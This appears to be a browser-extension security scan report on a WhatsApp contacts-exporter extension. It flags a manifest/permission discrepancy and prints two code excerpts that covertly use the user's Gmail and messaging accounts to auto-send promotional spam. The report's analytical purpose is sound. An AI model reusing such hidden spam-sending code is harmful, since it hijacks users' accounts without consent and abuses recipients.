Security Warning: High Security Risk
WAXP - Contacts Exporter for WhatsApp
ID: jpkhnmgaiachojobpgbfilkkjecgldle
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- So Lets Talk DigitalView Profile
- Privacy
- Privacy Policy
- Help
- Help Center
- Country
- IN
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
- Address
- C-25, C Block, Sector - 58 Noida, Uttar Pradesh 201301 IN
- Website
- Visit
Export all or unsaved contacts from WhatsApp™ groups, chatlist and labels to CSV file.
WA Bulk Contracts Extractor Extension by SoLetsTalkDigital (also known as “SO”) lets you extract contacts from your WhatsApp easily and makes them available for download in a csv file. This is not a Free Extension and offers Yearly and Lifetime subscription options at affordable prices for unlimited use. The subscription plans require payment that is processed by Razorpay. If you like this chrome extension, consider sharing your review with us. Your support will help us make this extension more robust. For any issues related to the WA Contacts Extractor Extension, then feel free to reach out to us on [email protected]. DISCLAIMER: This Chrome plugin is not endorsed or certified by WhatsApp Inc and is merely an unofficial enhancement and automation tool that works with WhatsApp for Web. The privacy of the users is important to us. We don’t broadcast, sell, share or distribute any user collected data. The extension was designed to keep privacy of our users in mind. For more information, read: SoLetsTalkDigital privacy policy: https://soletstalkapp.com/privacy Razorpay privacy policy: https://razorpay.com/privacy/
The bundled manifest declares MV3 with only the activeTab permission, no host_permissions, no externally_connectable, and no web_accessible_resources. The published CWS listing reports MV2 with storage, identity, identity.email, and *://api.gumroad.com/* permissions plus externally_connectable and web_accessible_resources listing client.js and libphonenumber-max.js. This is a material discrepancy: the installed extension likely operates under the published MV2 permission set, granting identity and storage access that are entirely absent from the reviewed bundle. A manifest that misrepresents its permission footprint is a high-severity integrity failure regardless of whether intent is proven.
{ "manifest_version": 3, "permissions": [ "activeTab" ], "background": { "service_worker": "jquery.min.js" }, "content_scripts": [ { "js": [ "contentscript.js" ], "matches": [ "*://web.whatsapp.com/*" ] } ], "version": "1.0.9"}This routine reads a stored list of email addresses from localStorage.allEmails, then programmatically fills Gmail's compose form (To, Subject, Body) and clicks the Send button to deliver promotional spam advertising the publisher's 'Whatsapp Bulk Marketing Software' at soletstalkdigital.com. The code executes automatically 20 seconds after page load whenever localStorage.autoGmail equals 'true'. This functionality is entirely unrelated to WhatsApp contact extraction, is not disclosed in the CWS data-collection categories, and turns the user's Gmail account into a spam delivery mechanism for the publisher's commercial products. The file is loaded into web.whatsapp.com for paid licensees via commonFindOnce.js / chrome.tabs.executeScript.
function doSendEmail() { function sendGmail(to, subject, content) { document.getElementsByName("to")[0].value = to; document.getElementsByName("subject")[0].value = subject; document.getElementsByName("body")[0].value = content; findaValue("Send", "input").click(); } function prepareBody(name) { return "Hi " + name + "\n\tI found your email on social media. Whatsapp Bulk Marketing Software is a great tool ... More info at\nhttps://soletstalkdigital.com ..."; } function emailNum(num) { allEmails = JSON.parse(localStorage.allEmails); return allEmails[num]; } function currentPlus() { localStorage.currentEmail = parseInt(localStorage.currentEmail) + 1; } var ce = emailNum(localStorage.currentEmail); sendGmail(ce.email, "Watch Out New Software", prepareBody(ce.name)); currentPlus();}function doBoth() { if (findaValue("Send", "input")) { doSendEmail(); } else { finda("Compose\u00a0Mail", "a").click(); }}if (localStorage.autoGmail == "true") { console.log(localStorage.currentEmail); setTimeout(doBoth, 20000);}This function injects promotional text ('head over to https://soletstalkdigital.com') into a message compose field and clicks Send, automating outbound messaging on behalf of the publisher. While no auto-trigger for this specific function was found in the reviewed bundle, its presence alongside the auto-triggering doSendEmail/doBoth pattern in the same file demonstrates a pattern of covert promotional automation using the user's messaging accounts.
function peperonityMessage() { a = finda("Write a message", "a"); b = findaValue("Send message", "input"); c = finda("Continue", "a"); if (a) { a.click(); } else if (b) { message.value = "head over to https://soletstalkdigital.com for more such software"; b.click(); } else if (c) { c.click(); }}By severity
Versions scanned
Showing 1 of 2 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.0.9 | 3 |
Files with findings
2 distinct paths — top paths by unique finding count:
- js/commonFind.js2
- manifest.json1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.